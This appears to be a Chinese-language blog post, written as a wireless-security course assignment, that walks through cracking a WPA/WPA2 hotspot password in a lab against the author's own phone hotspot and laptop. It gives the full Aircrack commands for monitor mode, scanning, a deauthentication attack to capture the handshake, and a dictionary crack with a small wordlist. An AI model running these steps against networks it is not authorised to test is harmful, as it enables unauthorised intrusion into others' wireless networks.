Skip to main content
  1. Posts/

窥间伺隙:Aircrack 套件破解 WPA/WPA2 密码

·

《无线网络安全》作业。梦回大一。

准备工作 #

手机开启热点,设置弱密码 merc123321,热点 SSID 为 nova 4。物理机连接 nova 4 无线网络作为被害主机。

图 1

为 Kali 虚拟机添加无线网卡,随后即可在 ifconfig 的输出中看到 wlan0 网卡:

图 2

首先启动监听:

$ sudo airmon-ng start wlan0

结果如图:

图 3

此时 ifconfig 可以看到 wlan0mon 监听网卡:

图 4

随后扫描无线网络:

$ sudo airodump-ng wlan0mon

结果如图,可以看到 nova 4 网络的 BSSID 为 D8:9B:3B:9E:AB:A9

图 5

利用该 BSSID 过滤掉其余网络流量:

$ sudo airodump-ng -c 11 --bssid D8:9B:3B:9E:AB:A9 -w psk wlan0mon

结果如图:

图 6

捕获 WPA 握手包 #

此时我们需要捕获到 WPA 握手包,因此可以攻击一个已经连接到该网络的主机(即我们的物理机),让它强制掉线并重连产生握手包。

首先查看被害主机 MAC 地址:

图 7

可以看到 MAC 地址为 F4:8C:50:9F:E5:43。实际上,在前面 airodump-ng 时的界面中也可以直接看到连接了该网络的主机 MAC 地址。随后发送 DeAuth 包使其掉线:

$ sudo aireplay-ng -0 1 -a D8:9B:3B:9E:AB:A9 -c F4:8C:50:9F:E5:43 wlan0mon

出现 WPA handshake 即捕获到了握手包,可以停止捕获了。

图 8

口令破解 #

此时在目录下会生成 psk-01.cap ,我们使用 aircrack-ng 进行口令破解:

$ sudo aircrack-ng -w password.lst -b D8:9B:3B:9E:AB:A9 psk*.cap

使用的字典中包含了 merc123321 这个真正的密码:

$ cat password.lst
merc123
merc1234
merc123456
123merc
1234merc
123456merc
merc123321
merc321123

最后即可成功破解:

图 9